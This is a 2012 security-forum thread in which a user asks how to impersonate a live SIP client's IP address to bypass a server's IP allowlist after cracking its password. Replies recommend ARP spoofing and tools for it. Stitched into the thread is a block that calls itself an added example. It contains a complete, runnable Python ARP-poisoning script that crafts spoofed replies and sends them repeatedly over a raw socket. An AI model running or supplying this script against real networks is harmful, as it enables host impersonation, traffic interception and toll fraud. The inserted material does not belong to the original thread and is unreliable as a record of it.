
Help Needed -- How to Takeover LAN IP Address from a Live Host?


C0de_X

Newbie

Posts: 1

Joined: Sat May 05, 2012 11:30 am

Post Sat May 05, 2012 11:32 am


Hey experts out there,

I need some urgent help & advice for my Pentest... here is the situation:

In my security testing lab environment, I have a SIP Gateway Server (let me just name it SRVA) and a SIP Client (CLTA) in the same switched LAN (same subnet). SRVA's IP address is 192.168.1.100 and CLTA's IP address is 192.168.1.200. All IP addresses are statically configured; no DHCP is involved.

SRVA and CLTA are communicating using the SIP protocol and they are using Digest Authentication between the two hosts. On top of the Digest Authentication, the server is also using the IP address as another security measure to authenticate the client side -- which means the server is configured to allow only SIP connection requests originating from CLTA's IP address (192.168.1.200), even after the Digest Authentication is successfully made -- no other source IP address is allowed by the server.

My task is to find a way to compromise the LAN security and successfully make VoIP calls from another computer (not CLTA). So I am almost there... as I have already cracked the SIP username and Digest Authentication password using a Man-in-the-Middle attack. So now I have the SIP username and the working SIP password, as well as a free VoIP softphone installed on my computer (IP address 192.168.1.210). I am very close to my final objective!

However, now I am facing a challenge on how to physically take over the IP address of CLTA (192.168.1.200)... as the SIP Server (SRVA) will deny my SIP connection from any IP address other than 192.168.1.200, even with the correct username/password. I tried to configure my IP address manually to 192.168.1.200, but as expected, after I do so, I receive an "IP Address Conflict" error and am not able to use the network -- I am sure the CLTA side will also have that error pop up.

-- How shall I go about successfully taking over 192.168.1.200 on the LAN, while I am not allowed to shut down CLTA or disconnect it from the network?

Need some ideas... thank you!

Regards

unicityd


Full Member

Posts: 170

Joined: Wed Sep 03, 2008 5:33 pm

Post Sat May 05, 2012 2:02 pm

Re: Help Needed -- How to Takeover LAN IP Address from a Live Host?

"ARP Spoofing" is the technique you need.

The Wikipedia article explains the basics and lists some tools:

http://en.wikipedia.org/wiki/ARP_spoofing

The short explanation is that each computer on the LAN has a MAC address and an IP address. Each Ethernet frame has to be addressed to the target computer's MAC address. As you've discovered, you can't just change the IP on your computer since the OS will check to see if anyone else is using the IP and refuse if it is in use. Instead of completely taking over the IP address (in which case you need to crash/flood/disconnect the client), you can just convince the server that your computer's MAC address is associated with 192.168.1.200. Using ARP Spoofing software, you can pretend to own the client's IP address knowing full well that it is in use.

ARP spoofing is a targeted attack, so you can convince the server that you own the client IP address without affecting other computers. For example, the client could still browse the web and the return traffic would reach him and not you.

Good luck with your lab.
BS in IT, CISSP, MS in IS Management (in progress)
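To make the "targeted" part of the answer above concrete, here is an added example (not from the thread or from any of the tools named in it) that builds exactly the frame an ARP-spoofing tool sends in this lab: a unicast ARP reply to SRVA claiming that 192.168.1.200 is at the attacker's MAC. The IP addresses are the ones from the question; the MAC addresses are assumptions, since the thread gives none. Building and parsing the frame needs nothing beyond the Python standard library; actually sending it uses a Linux `AF_PACKET` raw socket and requires root.

```python
import socket
import struct

# Lab addresses from the thread; the MAC addresses are assumed for the example.
SRVA_IP = "192.168.1.100"
SRVA_MAC = "00:11:22:33:44:55"      # assumed: the SIP server's real MAC
CLTA_IP = "192.168.1.200"           # the address the server trusts
ATTACKER_MAC = "de:ad:be:ef:00:01"  # assumed: the attacker's MAC

ETH_P_ARP = 0x0806
ARP_OP_REPLY = 2
ETH_HDR = struct.Struct("!6s6sH")           # dst MAC, src MAC, EtherType
ARP_PKT = struct.Struct("!HHBBH6s4s6s4s")   # htype, ptype, hlen, plen, op, sha, spa, tha, tpa


def mac_to_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", "").replace("-", ""))


def bytes_to_mac(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def build_arp_reply(claimed_ip: str, claimed_mac: str, victim_ip: str, victim_mac: str) -> bytes:
    """Unicast Ethernet frame carrying the ARP reply "claimed_ip is-at claimed_mac".

    The frame is addressed to victim_mac only, so only the victim's ARP cache is
    updated; every other host on the switch (including the real owner of
    claimed_ip) never sees it.
    """
    eth = ETH_HDR.pack(mac_to_bytes(victim_mac), mac_to_bytes(claimed_mac), ETH_P_ARP)
    arp = ARP_PKT.pack(
        1,            # HTYPE: Ethernet
        0x0800,       # PTYPE: IPv4
        6, 4,         # HLEN, PLEN
        ARP_OP_REPLY,
        mac_to_bytes(claimed_mac), socket.inet_aton(claimed_ip),  # sender fields: the lie
        mac_to_bytes(victim_mac), socket.inet_aton(victim_ip),    # target fields: the victim
    )
    return eth + arp


def parse_arp_frame(frame: bytes) -> dict:
    """Decode the frame the way the victim's stack will, returning the fields it acts on."""
    dst, src, ethertype = ETH_HDR.unpack_from(frame, 0)
    if ethertype != ETH_P_ARP:
        raise ValueError("not an ARP frame")
    htype, ptype, hlen, plen, op, sha, spa, tha, tpa = ARP_PKT.unpack_from(frame, ETH_HDR.size)
    return {
        "eth_dst": bytes_to_mac(dst),
        "eth_src": bytes_to_mac(src),
        "op": op,
        "sender_mac": bytes_to_mac(sha),   # what the victim will cache for sender_ip
        "sender_ip": socket.inet_ntoa(spa),
        "target_mac": bytes_to_mac(tha),
        "target_ip": socket.inet_ntoa(tpa),
    }


def poison_frame_for_srva() -> bytes:
    """The one frame that makes SRVA map 192.168.1.200 to the attacker's MAC."""
    return build_arp_reply(CLTA_IP, ATTACKER_MAC, SRVA_IP, SRVA_MAC)


def send_frame(iface: str, frame: bytes, repeat: int = 1, interval: float = 2.0) -> None:
    """Linux only, needs CAP_NET_RAW (root). Re-send periodically: the poisoned
    entry otherwise expires or is overwritten by the real client's own ARP traffic."""
    import time
    s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(ETH_P_ARP))
    s.bind((iface, 0))
    try:
        for _ in range(repeat):
            s.send(frame)
            time.sleep(interval)
    finally:
        s.close()


if __name__ == "__main__":
    import sys
    frame = poison_frame_for_srva()
    print(parse_arp_frame(frame))
    if len(sys.argv) > 1:          # e.g. python3 arp_poison.py eth0
        send_frame(sys.argv[1], frame, repeat=30)
```

Because the frame is unicast to SRVA's MAC, CLTA and the rest of the LAN are untouched, which is the targeted behaviour the post describes. Note that poisoning SRVA's cache only redirects the server's traffic for 192.168.1.200 to the attacker's NIC; for the softphone to complete a call, the attacking host must additionally accept and answer packets addressed to 192.168.1.200, which is a separate step this example does not cover.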

unicityd


Full Member

Posts: 170

Joined: Wed Sep 03, 2008 5:33 pm

Post Sat May 05, 2012 2:23 pm

Re: Help Needed -- How to Takeover LAN IP Address from a Live Host?

BTW: If you're on Windows, try Cain & Abel. 
BS in IT, CISSP, MS in IS Management (in progress)

impelse

Hero Member

Posts: 585

Joined: Mon Feb 16, 2009 3:40 pm

Post Sun May 06, 2012 8:23 am

Re: Help Needed -- How to Takeover LAN IP Address from a Live Host?

Use the same Man-in-the-Middle that you used for getting the username and password to pose as the IP address with the MAC.....
CCNA, Security+, 70-290, 70-291
CCNA Security
Taking Hackingdojo training

Website: http://blog.thehost1.com/
